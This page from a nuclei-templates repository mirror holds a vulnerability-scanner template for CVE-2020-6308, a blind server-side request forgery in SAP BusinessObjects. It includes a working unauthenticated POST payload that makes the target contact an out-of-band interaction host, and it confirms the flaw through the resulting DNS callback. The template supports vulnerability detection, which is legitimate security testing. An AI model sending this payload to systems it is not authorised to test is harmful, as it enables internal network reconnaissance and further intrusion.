daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2020/CVE-2020-6308.yaml

50 lines
2.2 KiB
YAML
Raw Blame History

id: CVE-2020-6308
info:
name: SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery
author: madrobot
severity: medium
description: |
SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.
remediation: |
Apply the relevant security patches provided by SAP to mitigate this vulnerability.
reference:
- https://github.com/InitRoot/CVE-2020-6308-PoC
- https://launchpad.support.sap.com/#/notes/2943844
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
- https://nvd.nist.gov/vuln/detail/CVE-2020-6308
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-6308
cwe-id: CWE-918
epss-score: 0.00306
epss-percentile: 0.66543
cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sap
product: businessobjects_business_intelligence_platform
tags: cve,cve2020,sap,ssrf,oast,unauth
http:
- raw:
- |
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: location
words:
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"
# digest: 4b0a00483046022100e7d4cc6e8a448ba5556bf00ceb31df11865b4a014d2a00482164292a66cbfaa6022100934fb9fad49d1c1a40120410235ed8b91cbc287e5394c30f4248141c108fdbbd:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink